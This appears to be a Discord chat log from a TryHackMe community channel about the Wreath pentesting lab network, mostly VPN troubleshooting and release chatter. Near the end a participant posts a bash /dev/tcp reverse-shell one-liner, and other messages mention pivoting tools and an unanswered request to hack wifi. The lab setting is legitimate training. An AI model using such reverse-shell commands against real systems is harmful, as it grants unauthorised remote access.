mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Initiating SYN Stealth Scan at 20:04
Scanning thomaswreath.thm (10.200.180.200) [15000 ports]
Nmap scan report for thomaswreath.thm (10.200.180.200)
Host is up, received user-set.
All 15000 scanned ports on thomaswreath.thm (10.200.180.200) are filtered because of 15000 no-responses
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3004.14 seconds
Raw packets sent: 30000 (1.320MB) | Rcvd: 15 (520B)
to get it fixed, just do the steps listed in the message just above
reset the progress
leave room
wait 4 - 6 minutes
join again
wait 6 - 7 minutes
go to access page -> networks -> select wreath v2
hit regenerate
download and connect to vpn
ping the ip you've been given in THM
if ping works, then youre golden, if not, do all of that again 1 through 10.
Hey guys, I just finished the wreath room, do I vote for a reset?
The VPN file for wreath is so unreliable
sometimes it works and then 85% of the time it doesn't
are you using the v2 VPN file?
Yes, and sometimes that won’t even generate on the site
I suggest you leave the room and join back a few minutes later: you will land on new instance with different IPs
then regenerate the VPN file and try again
Alright, I’ve tried that before and it didn’t do much but I’ll give it another shot
Thanks
Now it seems like most of the networks aren't showing up on THM, and I can't access hints
I used to use THM all the time why does it seem so buggy now
I'm also unable to sV scan through nmap with a proxy up? Here are some screenshots:
Please let me know what I'm doing wrong here
@opal sky I finished Wreath a couple of weeks ago, but it was very unstable. I'm not sure if it'll be helpful but... checking my notes, I used autossh to stabilize my general SSH connection:
sudo apt install -y autossh
autossh -M 0 -o "ServerAliveInterval 15" -o "ServerAliveCountMax 3" -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p 22 -i target_id_rsa root@$TARGET
Had to wait for it come back sometimes, but it would autoconnect.
For nmap, I uploaded a static nmap to the first hop server for basic scanning (since it'll lack the scripts). proxychains nmap seemed to work for me thru my autossh connection if you want full -sC features. I don't see where your nmap command is using the proxy... also your sshuttle can't find the keyfile
The network could be off. I did have to take a full day off Wreath because it wouldn't cooperate. Maybe took me 3-4 days given how bad the network was. Best of luck
Thank you!!
Fwiw, the network itself is fine provided no one's been a dick and messed an instance up for everyone else.
The supporting infrastructure seems to have been left to rot for a while now though. Kinda sad to see 🙁
That was a big project once upon a time.
Lol my Red Team Manager LOVES Wreath, recommends it to learn proper pentesting networks instead of just popping boxes. Hopefully it can get a little infra revamp at some point.
We have migrated to v2 network here, which has improved stability significantly. Also means that all networks have exactly the same IPs and subnets, which further helps with stability.
That being said, the VMs themselves probably need a bit of a refresher and update. That is the future plan for all networks, just finding time to get to it has been hard.
Update, I finally got proxychains to actually do something. It's weird, because I HAVE to run it with sudo, and I have to include -Pn. I expected the pn flag due to the icmp limitations, but I did not expect it to require sudo. Thanks for your help again!
Gave +1 Rep to @open elk (current: #3231 - 1)
Now that is good to hear, thank you ♥️
Any idea why so many people still seem to be having stability problems? Would definitely be nice to let the VMs update to get rid of unintended paths, but they're golden images which worked fine at release. They shouldn't have changed since.
Gave +1 Rep to @soft loom (current: #33 - 336)
The latest stability issues is on me. With the v2 migration I made some mistakes with the VPN profiles. But all of those should have been resolved now (still testing).
A big issue is users not connecting to the VPN correctly or using tryconnectme to debug the connection from the attackbox. Also, for YEARS users have been told if something goes wrong, leave the network and join another one, leading to them not debugging but rather taking the exit route until it works. But with v2 networks, all subnets are the same, so years of that now needs to be de-learned. Which is going to take some time.
You are right, nothing in the golden images changed, so should not be an issue. But I have come to see interesting pesky time-based issues creep in, such as:
- User accounts expiring
- AD certificates expiring
These can break the images over time, requiring a refresh then
At least with v2 networks, we can now actually refresh these images ourselves. No need for backend access anymore, so the refreshes themselves are easier
Wreath doesn't have any AD 😄
I seem to remember putting an autogen in for the prod webserver certificate as well, although that may have broken if someone made changes and cloned without resetting it.
Yeah, wreath doesn't have this issue but all my AD networks does 😅 So fun times. But yeah, now that all networks are v2, can actually start pushing patches to all of them. We are also in the process of revamping all AD content, so that will be good as well!
Hello, I have tried 4 times your steps already - is there anything that I am missing? I have the same issue and been trying for a couple of hours back and forth now. Had a look in other solutions here, but nothing seems to be working so hence the direct reply to this post 🙁
make sure you use the v2 VPN file for Wreath
if you use THM AttackBox, I suggest you troubleshoot access to the network by running the tryconnectme command
hihi i can't seem to access openvpn wreathv2 coz of cipher issues
can anyone help
i alrdy changed the ciphers in the config file according to instructions but wldn't work
i followed these steps but still cldn't ping the ip in THM Wreath network
The errors I had was because there were multiple openvpn instances running
closed them all up and it worked. Also the network connection takes some time, so the ping command might not work if you joined it too recently.
how to hack wifi and find information to everyone who connected WiFi?
asking for a friend?
What
Nooooo! Wreath got paywalled 🙃
Hey guys, need help downloading the config file to the Wreath room. Nothing happens.
I'm a subscriber so shouldn't be because of the streak requirement
like I click download and nothing happens
Please someone help me because this ain't me
It is Free again, was an issue on our end. 🙏
Hi, I had a problem when going through this room. In short, when trying to establish a reverse shell with access to the first target host, the host itself can no longer initiate connections to my PC (I'm using the wreathv2 config). As I understand it, the problem is due to the fact that the first target is on a different subnet (I have 10.250.180.5, and the target is 10.200.180.200)
Right - there's a technique to do just that (reverse shell with a hop) 😉
thanks
Gave +1 Rep to @upper quiver (current: #161 - 61)
Hello everyone!!!
Hi all
I’m having an issue where I try to navigate to the access page to get the vpn config file and it gives me a 404 error.
Has anyone else experienced this ?
Also, do we have to use the open vpn client if using the attack box ?
why is wreath-pc's curl not working
it can't even curl google.com
someone help
its really frustrating
Hi there, I've been struggling to be able to establish a reverse shell with the second host. Here's what I've tried:
- I've been struggling with SShuttle to be able to proxy all it says is that my access is denied
- Considering I used chisel, I've tried backgrounding it on the compromised machine (chisel client) and I've tried setting up netcat listener while also attempting to trigger the payload through curl (using the attacker machine)
Please help, I've kinda been struggling for 3 days trying to solve this issue 😅
Is it a windows box or linux?
(You know there are other ways to get files over HTTP, right?)
If access is denied, it may be because you[r current user] doesn't have permission to open ports.
But you can open ports on your own machine, right?
- Network page I seem to recall someone else asking a similar question on the AD network... the suggestion was to make sure you've joined the room, and have the required streak (if applicable), then refresh the page.
- No
Hi everyone, i'm doing this Room and since this afternoon, I suppose that the git-serv isn't working anymore, I don't have any response from this :/
I don't know what to do except restart the network (kinda sucks for me, i'm writing a report while i'm doing the room and changing the IP will be weird I think)
ctrl F + replace old IP with new IP
you'll be ayt tho
why can't i get an vpn file
under access via openvpn in Networks section no network has shown or regenerated even though i've started the network
We encountered something similar for a different network. If you still get something like this (nothing shown but a blank selection) try it out anyway.
exact same problem
Sorry to hear that. I'm not mastering this enough to help you much further. Tho, try logoff→login→restart network→see if new vpn file gets generated?
Also, I think I've read that when you click to generate, it's best to wait like a few seconds before downloading it. Dunno if this is true or not but it's worth the wait to try.
Did you try accessing with a normal THM VPN?
There was some network structure revamps recently (your IP should be in the 192.168.x.x range, no longer 10.x.x.x)
Should be fixed. 🤞
Nooooooo! When did Wreath get paywalled 😭
hey guys how do we get the configuration pack for the wreath network, when attempting to access the link it comes back with a 404.
I am Unable to start Wreath Network . I have joined the room and downloaded the premium vpn package and connected to it. Kindly Help
Click Leave Room Rejoin
Click Start Machine again
Wait 2–3 minutes
Restart your VPN connection
Refresh the room page
Try switching VPN servers
Log out then Log back into TryHackMe
Reconnect VPN then confirm Initialization Sequence Completed
Check tun0 then run ip a
Start the machine again in the room
Use correct Premium .ovpn file
Disable other VPNs
Run OpenVPN as Admin
Temporarily disable firewall
Restart PC and try again
If still not working send me error message.
Leave room then Rejoin room
Go to the Access page then Click Regenerate VPN
Download again after 2–3 mins
Switch VPN server region then Regenerate then Download
Refresh page or Log out & back in
If it is still 404 then use the Attack box or wait for the server issue maybe
Hey , I cannot start the network , cannot generate a vpn file , cannot start attack box ,tried re login still stuck...
any help ?
its really frustrating
Open in Incognito mode
Clear browser cache
Try different browser
Try different network
Wait 2–3 mins. and retry
If still Platform server issues go through #1333993673381253162
Any Arabs here?
Is it just me, or is this network very hit or miss? Even with pinging it stops responding and then randomly starts/stops again
Yes, it needs maintenance. A bit abandoned.
hey,can anyone help me out please am stuck on getting reverse shell for task 41 .i did what the walkthrough says but still am not getting reverse shell
Solved it ?
I could take you through it
👀
👀
First
12™️
Wreath >>>>>> Holo
does this mean Wreath soon?!
@calm wedge
It does 🙂
heheheh
Hors
NOOOO
uh oh
Muir remove it
🏃♂️
Don't I need manage messages for the bot @merry robin
What?
Cry had manage message perms and could warn people lmao
Oh, no, I fixed that one
eeeeeeeee
The bot literally won't respond to anyone who isn't a moderator now
bet
!warn @cyan vine mean
Damn you got me there
Well it's works
It's -
.

i am late
gib network
yes
👀👀
👀 👀 👀
((:
gib wreath
🥇 🥳
Wreath
🥳 🥇
Giefs wreath
Very soon
🔜
Sooner™️ than Soon™️
Soonish™
waiting
W R E A T H
lol i guess the network links are gone


it's a prank guys
Gib wreath

lol
Wreath was a hoax made to distract people from the delay on holo
Except wreath was better
Is tyvm
Muri
giv wreath 
Gib me wreath test
I think I can join the room, but muir might ban me 
:(
There's no point in giving testing access -- it'll be released before you finish
You sure?
Positive
he threatened to do it the last time I joined a pre-release room 
When is it going to be released then
You know Dark's been outright banning accounts that join networks early, right?
ooh, I didn't join this time
Thanks, banned
I haven't even joined yet 
At least I haven't been banned from this one 😂

W R E A T H
will it be online tonight EMEA?
just so I don't refresh compulsively if it isn't 🙂
🔜
@merry robin this is oppression
🥳
🥇 Wreath 🥇
🥳

Up to 10 last deleted messages (last hour or 12 hours for premium):
1 minute ago (Thu Mar 18 16:26:33 2021) Jayy#5396: https://media.discordapp.net/attachments/463376830213390336/822143788273238026/pixlr-bg-result.png
Hi Jay
@calm wedge 
There is no Spoon but Wreath is Soon™️
👀




>
> > > > > > > > > 

>>>

🤷‍♂️

✅
Just FYI, kaspersky (incorrectly) flags some download triggered by clicking on the wreath logo as malware.
Yeah, we're trying to convince them that TryHackMe is not a virus
It's out 
@merry robin ^
👀 it was under the learn page - networks. Was I not supposed to join yet?
I think it was meant to be kept quiet
Oh my bad
Is it required to have a 35 day streak?
Yeah
I gotta wait 35 days, oh brother...just gonna stare at it
Muir get skidy to update the thing on the streak plz
Is the streak requirement gonna be temporary in order to balance the load for now, will there be other ways to get access, or what's up with that?
@merry robin solid room btw!
Maybe.
This is a soft release just now -- we're just testing the waters and seeing what people think.
The streak requirement on the site that's listed is 20
So I imagine it'll be backed down to 20 soonish?
Or the thing on the site will be changed.
I'll sit down with Skidy/Ashu before the hard release and see what's what.
I can understand it as a soft release thing, but in general I have been unable to get a very high streak, like I don't have the time to get a streak up for it. So would be nice to see alternatives.
it's a test run duco. they will most likely come up with efficient alternatives
Glad to know it'll be discussed though.
I have friends who could do with running through it before easter, so I'm hoping something comes up
I have some ideas around using the subscription to either lower the streak requirement or outright give access. Might be worth thinking about vouchers or something too. No promises there by any means -- it's just spit balling and it's not my decision
Again, completely understandable. Hope you guys work smth out that works for everyone
Overall from what I could see of the material, good stuff :)





Thank you Muiri for creating the network, it's awesome! It shows how much work went into it 🙂
time to streak again
video isnt out yet as the network hasnt been officially released
makes sense ❤️
Am I not supposed to join the wreath room yet?
Wreath isn't fully released yet, a 7 day streak is currently required as it's a soft launch
Failed to get reverse shell :/
tried lots of times, lots of ways
Tried manually as well as via exploit script
then I realized, reverse shell worked for unix only, not the OS of target
so only option left - manual
but pseudoshell :/ didn't execute it
0<&196;exec 196<>/dev/tcp/<My IP>/<unfiltered port>; sh <&196 >&196 2>&196
since the target server had not netcat pre-installed

Hey, wanted to ask if we can stream wreath?
and is it okay to make public notes based on it
you solved all the tasks ?
Can I DM you please?
sure, but i havent done the lab yet
It's all free anyway, so go for it.
Do us a favour and maybe wait for the actual release before streaming though?
Okay thank you, will stream after the full release 
@merry robin I get "You need a 7 day streak to join this room.", but I already had a streak way above that. I can prove this with my badges.
Is this a bug?
No -- I believe it's current streak (although allowing past streaks based on badges is a neat idea!)
The way it works just now is you have an active 7 day streak to join, then once you're in, that's you good to go from then on (i.e. the streak doesn't actually need maintained after that in order to keep accessing)
This is the soft release though, so how it works just now might not be how it works come official release time
Alright, thanks 🙂
I seem to be missing one open port in Git Server enumeration, I wonder what I'm doing wrong there.
Is it 5357 that's missing @solemn pendant?
Um, that won't make a lot of sense actually
Spin it around -- which ports are you seeing?
That one is missing, yes.
||80, 3389 and 5985||?
correct.


